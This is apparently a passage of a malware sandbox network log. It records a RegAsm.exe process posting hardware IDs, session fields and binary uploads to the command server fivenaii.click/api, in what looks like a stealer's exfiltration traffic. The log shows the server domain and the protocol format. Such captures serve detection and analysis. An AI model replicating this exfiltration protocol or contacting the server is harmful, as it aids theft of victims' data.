                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 79 71 77 6e 4a 70 4e 42 78 35 6f 78 7a 6f 51 68 2b 6e 41 53 30 64 73 53 6a 2f 54 69 66 75 4b 78 70 6d 59 77 41 4e 71 69 4c 56 73 75 33 57 50 6d 4d 2f 57 79 37 6d 58 36 45 42 47 62 56 49 65 56 4b 58 49 65 5a 49 65 36 5a 71 42 43 4e 33 54 41 71 72 62 34 66 7a 35 4e 45 33 5a 44 56 66 4c 75 41 4e 37 6b 63 4d 72 51 55 72 41 4c 77 6e 36 45 6b 74 38 53 6b 64 61 32 55 41 48 36 34 76 33 4c 69 6b 6c 58 4a 70 49 42 78 35 6f 7a 7a 34 56 78 53 71 42 44 63 5a 74 79 2f 37 53 54 43 38 5a 46 74 38 61 52 31 4e 2f 7a 6e 50 70 4f 50 45 66 48 64 34 57 79 32 6a 52 36 39 48 46 36 73 50 4a 78 79 6b 4b 65 74 4c 4c 2f 55 6a 48 32 56 74 44 41 6d 6a 4b 4e 71 77 36 4e 41 31 62 54 64 59 4b 4f 30 57 34 41 46 51 37 51 38 35 55 75 35 73 7a 46 38 6a 38 43 64 62 63 69 41 56 54 61 41 6a 6e
                                                                                              Data Ascii: yqwnJpNBx5oxzoQh+nAS0dsSj/TifuKxpmYwANqiLVsu3WPmM/Wy7mX6EBGbVIeVKXIeZIe6ZqBCN3TAqrb4fz5NE3ZDVfLuAN7kcMrQUrALwn6Ekt8Skda2UAH64v3LiklXJpIBx5ozz4VxSqBDcZty/7STC8ZFt8aR1N/znPpOPEfHd4Wy2jR69HF6sPJxykKetLL/UjH2VtDAmjKNqw6NA1bTdYKO0W4AFQ7Q85Uu5szF8j8CdbciAVTaAjn
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 71 4c 68 68 58 4e 2b 59 59 2b 51 4d 72 72 67 59 76 46 61 42 73 38 6e 74 75 76 43 55 42 4c 54 59 31 46 4f 63 6f 30 2f 4f 38 6d 79 64 70 4f 46 73 37 39 52 6a 6a 55 42 57 67 42 41 4d 64 73 54 72 75 53 79 50 74 49 31 64 6d 59 30 78 44 35 79 6a 48 38 37 79 62 48 57 6b 75 58 77 37 67 44 75 59 42 55 4f 30 50 4e 31 4c 75 62 4e 4d 45 4d 76 38 36 47 47 4a 2f 4d 6b 33 2f 4e 75 48 7a 37 38 30 31 66 6a 74 4b 4b 75 34 54 2f 6e 39 65 39 56 78 7a 51 4f 52 2b 76 31 74 67 34 78 56 56 4c 57 39 4d 56 5a 34 32 6e 36 57 6b 67 32 41 67 65 45 35 68 75 31 2b 6f 51 67 79 2f 44 69 49 45 74 57 76 54 65 67 66 71 49 42 78 39 61 52 73 43 35 32 47 66 76 4b 53 44 43 79 34 78 57 7a 72 79 43 65 4a 52 47 65 30 33 62 31 4b 75 62 4c 55 45 46 66 38 6b 46 57 70 34 48 55 43 41 4f 64 57 30 39 4e
                                                                                              Data Ascii: qLhhXN+YY+QMrrgYvFaBs8ntuvCUBLTY1FOco0/O8mydpOFs79RjjUBWgBAMdsTruSyPtI1dmY0xD5yjH87ybHWkuXw7gDuYBUO0PN1LubNMEMv86GGJ/Mk3/NuHz7801fjtKKu4T/n9e9VxzQOR+v1tg4xVVLW9MVZ42n6Wkg2AgeE5hu1+oQgy/DiIEtWvTegfqIBx9aRsC52GfvKSDCy4xWzryCeJRGe03b1KubLUEFf8kFWp4HUCAOdW09N
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 55 32 33 74 46 4f 39 47 44 72 73 54 62 52 71 31 4e 76 64 36 48 74 63 6d 48 57 70 30 43 77 75 42 44 35 2f 39 70 4e 52 79 4e 67 45 63 61 61 4d 67 6f 51 45 47 37 56 42 68 4a 37 55 69 34 30 4d 32 37 57 63 7a 54 6c 51 32 54 34 73 6f 79 76 48 51 33 43 4a 2f 4d 31 45 74 6f 31 47 76 52 31 37 31 57 47 39 53 73 6a 32 74 48 48 43 75 63 55 34 2b 4f 56 78 66 75 47 48 47 38 2f 4b 62 61 6a 78 32 48 44 4f 6a 52 36 38 47 48 62 38 61 4a 78 47 67 4c 36 70 36 48 74 73 6b 48 47 78 34 48 42 71 6f 45 65 47 6d 35 39 55 38 61 53 35 4e 59 61 31 66 34 41 46 47 6c 45 68 70 55 6f 6c 69 72 56 78 67 70 47 6f 75 62 6d 41 43 43 72 45 2b 6b 70 54 71 33 44 4e 34 4b 45 73 75 6f 31 47 76 52 31 37 31 57 6d 39 53 73 6a 32 74 48 48 43 75 63 55 34 2b 4f 56 78 66 75 47 48 47 38 2f 4b 62 61 6a 78
                                                                                              Data Ascii: U23tFO9GDrsTbRq1Nvd6HtcmHWp0CwuBD5/9pNRyNgEcaaMgoQEG7VBhJ7Ui40M27WczTlQ2T4soyvHQ3CJ/M1Eto1GvR171WG9Ssj2tHHCucU4+OVxfuGHG8/Kbajx2HDOjR68GHb8aJxGgL6p6HtskHGx4HBqoEeGm59U8aS5NYa1f4AFGlEhpUolirVxgpGoubmACCrE+kpTq3DN4KEsuo1GvR171Wm9Ssj2tHHCucU4+OVxfuGHG8/Kbajx
                                                                                              2024-12-27 21:33:16 UTC1369INData Raw: 46 33 50 52 67 69 75 53 47 39 53 75 6d 79 31 42 43 48 32 4f 68 5a 69 61 55 41 4b 76 53 69 66 2f 61 54 56 63 6a 5a 34 58 53 76 7a 45 75 42 47 55 71 73 47 4c 31 4b 70 59 76 51 45 4e 72 78 79 53 43 4d 75 48 6b 33 2f 62 35 69 77 39 73 6b 30 62 53 35 66 5a 74 30 68 77 6c 4d 5a 76 51 74 6a 49 37 73 6f 2b 31 45 6a 37 43 30 6c 55 30 4d 65 43 72 63 73 6e 59 4c 79 32 44 4a 67 50 78 78 76 6f 77 65 76 47 56 36 41 47 69 59 43 74 57 79 6a 42 43 79 38 63 6c 74 67 66 41 73 64 70 47 50 59 71 65 4f 62 4c 53 41 68 48 44 65 6a 52 37 77 50 58 72 39 49 65 56 4c 78 49 75 42 46 49 2f 49 70 43 58 39 6f 44 78 75 6b 61 4f 47 4e 79 63 6b 31 66 6a 73 65 45 4f 34 62 2b 56 51 64 76 51 38 66 4c 4a 73 2b 36 6c 51 6a 76 67 59 63 59 47 49 79 4d 35 41 2b 32 4b 4f 6d 2f 54 46 34 4f 78 78 76
                                                                                              Data Ascii: F3PRgiuSG9Sumy1BCH2OhZiaUAKvSif/aTVcjZ4XSvzEuBGUqsGL1KpYvQENrxySCMuHk3/b5iw9sk0bS5fZt0hwlMZvQtjI7so+1Ej7C0lU0MeCrcsnYLy2DJgPxxvowevGV6AGiYCtWyjBCy8cltgfAsdpGPYqeObLSAhHDejR7wPXr9IeVLxIuBFI/IpCX9oDxukaOGNyck1fjseEO4b+VQdvQ8fLJs+6lQjvgYcYGIyM5A+2KOm/TF4Oxxv


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              9 | 192.168.2.4 | 49752 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:15 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:16 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6eqjouvagg6mjrj14ouf43j6v5; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1exmNpDPvq3riogKFs2QZbU8G3sZcID%2BC4wcLe7Z3PZxMDMS9%2Bw00qrt4KzKOAI7QfdV1fAIlBWWp0bBjfZL6Plm39lymLWdkgtf3glV%2BGFrEFnTJW3OB%2B7y9rAFqG8aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8f1f49c341-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1711&rtt_var=663&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1625835&cwnd=177&unsent_bytes=0&cid=c82bc5d2793f187d&ts=776&x=0"
                                                                                              2024-12-27 21:33:16 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              10 | 192.168.2.4 | 49755 | 104.21.60.24 | 443 | 2196 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:17 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:17 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:18 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=78av4f460367gec90vcedgokl0; expires=Tue, 22 Apr 2025 15:19:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pl%2FwCY0Mg7%2B3Gr5PIqMskF6CKOhh%2BXuZM3qelwh9BiNRjHmLUuuZN44BK1vlBrVVH7lwrtuVVgfcStU6TeklrNy7zJeMlLBtckFeilFrC7Ia0y8y%2BoI42jLx1NQmaHV%2Bng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d9bfa044316-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1674&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=950&delivery_rate=1625835&cwnd=177&unsent_bytes=0&cid=1ed3a6d43fc5e18a&ts=789&x=0"


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              11 | 192.168.2.4 | 49757 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:18 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K29GIXJ1E8TBCVOBTV
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18168
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:18 UTC15331OUTData Raw: 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 32 39 47 49 58 4a 31 45 38 54 42 43 56 4f 42 54 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f
                                                                                              Data Ascii: --K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="pid"2--K29GIXJ1E8TBCVOBTVContent-Disposition: form-data; name="lid"VC6Dfm--TestO
2024-12-27 21:33:19 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1qk4514vfes50pkibmf612jgua; expires=Tue, 22 Apr 2025 15:19:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8L6psK490HzsIxGYZs9e9X8HABR1Bu4rPpY0cDg9LhXqqyIX7%2Bd4Kt8%2BX9tk9DlCMIJgpQ3Xiq59YLgbnOtpY2wiQ2g138T663F6CLxTHOwi0Q5eW6Yxmo9JpZP8fetdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d9d3d95429e-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1754&rtt_var=669&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19128&delivery_rate=1623123&cwnd=208&unsent_bytes=0&cid=ff79b5e6d84e2a6c&ts=1023&x=0"
2024-12-27 21:33:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-27 21:33:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49759 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:33:20 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6G55XVIVJGCYD2KDH6P
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8795
                                                                                              Host: fivenaii.click
2024-12-27 21:33:20 UTC | 8795 | OUT | Data Ascii:
--6G55XVIVJGCYD2KDH6P
Content-Disposition: form-data; name="hwid"

B9B295F31A84D198BEBA0C6A975F1733
--6G55XVIVJGCYD2KDH6P
Content-Disposition: form-data; name="pid"

2
--6G55XVIVJGCYD2KDH6P
Content-Disposition: form-data; name="lid"

VC6Dfm--Te
2024-12-27 21:33:21 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:21 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=u79rl1gf7g9sptisk0cnkfli7j; expires=Tue, 22 Apr 2025 15:19:59 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hR4pm5cr8nmLPkquxXnEop1byh3kbtFOcsNWsjqcJrFrfvJwNYM2wdWykthOEdJJSMrvGxaS3GiMwTi96SyGX2xfOG29QCgBgDgdc4DPUMK4BHmG6EjW99MMxdgLH4EoFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dac0fad434a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1738&rtt_var=699&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9733&delivery_rate=1513737&cwnd=228&unsent_bytes=0&cid=e30165c752f8e79f&ts=833&x=0"
2024-12-27 21:33:21 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-27 21:33:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49761 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:33:22 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K1R1QCQ80Y27RGQNZZ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20442
                                                                                              Host: fivenaii.click
2024-12-27 21:33:22 UTC | 15331 | OUT | Data Ascii:
--K1R1QCQ80Y27RGQNZZ
Content-Disposition: form-data; name="hwid"

B9B295F31A84D198BEBA0C6A975F1733
--K1R1QCQ80Y27RGQNZZ
Content-Disposition: form-data; name="pid"

3
--K1R1QCQ80Y27RGQNZZ
Content-Disposition: form-data; name="lid"

VC6Dfm--TestO
2024-12-27 21:33:22 UTC | 5111 | OUT | Data Raw: [binary payload omitted]
2024-12-27 21:33:23 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6isg9qjnhp2c72rif56189md4a; expires=Tue, 22 Apr 2025 15:20:02 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FBCKmL2%2F4Q3B3cnGcuKlE8jQZCCZMTqq1U535cW5dzkmQBUMvboZq6jQskZ0xu5cghuyWV54unMeg9vLeYyTPWCsuFNJuK70BfIFo3kHuI%2FY3u%2FnBF9rnN8haPKbrCfIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dbb29e1427f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1607&rtt_var=617&sent=20&recv=25&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21402&delivery_rate=1751649&cwnd=239&unsent_bytes=0&cid=9a08c280fe838b81&ts=1246&x=0"
2024-12-27 21:33:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-27 21:33:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49763 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:33:25 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=C9M7QTVU9XVV7VB4
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1272
                                                                                              Host: fivenaii.click
2024-12-27 21:33:25 UTC | 1272 | OUT | Data Ascii:
--C9M7QTVU9XVV7VB4
Content-Disposition: form-data; name="hwid"

B9B295F31A84D198BEBA0C6A975F1733
--C9M7QTVU9XVV7VB4
Content-Disposition: form-data; name="pid"

1
--C9M7QTVU9XVV7VB4
Content-Disposition: form-data; name="lid"

VC6Dfm--TestOtctuk
2024-12-27 21:33:26 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=iujr80dtbp0fpf3a7hodj6rhdc; expires=Tue, 22 Apr 2025 15:20:04 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xtziaq%2BcyaX%2FxBAwcLhVTyvKycEijKGozDg0aGR33oMmgzCeon%2ForazqQGad6payLUtOPmXuqhkQpgorYvzTKqh98iGHorSY4KtrOHesZGGukp8%2BRmlzT611bmHusp3zRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dcadbe4c46b-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1639&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2185&delivery_rate=1730883&cwnd=226&unsent_bytes=0&cid=00453f30823f6891&ts=773&x=0"
2024-12-27 21:33:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-27 21:33:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49762 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:33:25 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L0O4KIZ8
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18108
                                                                                              Host: fivenaii.click
2024-12-27 21:33:25 UTC | 15331 | OUT | Data Ascii:
--L0O4KIZ8
Content-Disposition: form-data; name="hwid"

B9B295F31A84D198BEBA0C6A975F1733
--L0O4KIZ8
Content-Disposition: form-data; name="pid"

2
--L0O4KIZ8
Content-Disposition: form-data; name="lid"

VC6Dfm--TestOtctuk
--L0O4KIZ8
Content-Dis
2024-12-27 21:33:25 UTC | 2777 | OUT | Data Raw: [binary payload omitted]
2024-12-27 21:33:26 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=5ibsuo1lv9glq2seo92grd68rc; expires=Tue, 22 Apr 2025 15:20:05 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kokgEiQIKMJ28u00nLu05Rhpe3m%2FIStCBak8tXBbDiYbLotkjoGxQ6kA1J0pbPW%2FoHQuC%2FiLfNlnmRmErysy6KTkbmYxa1ZF733fIMhJ%2BSarmAaXKSCf2wtZtkw3Lpxqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dcade127277-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2002&rtt_var=769&sent=16&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19058&delivery_rate=1407228&cwnd=225&unsent_bytes=0&cid=9268467016b9fc75&ts=951&x=0"
2024-12-27 21:33:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii:
f
ok 8.46.123.189
2024-12-27 21:33:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii:
0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49764 | 104.21.60.24 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 21:33:27 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=CP7BM4U9RCKUZ8R
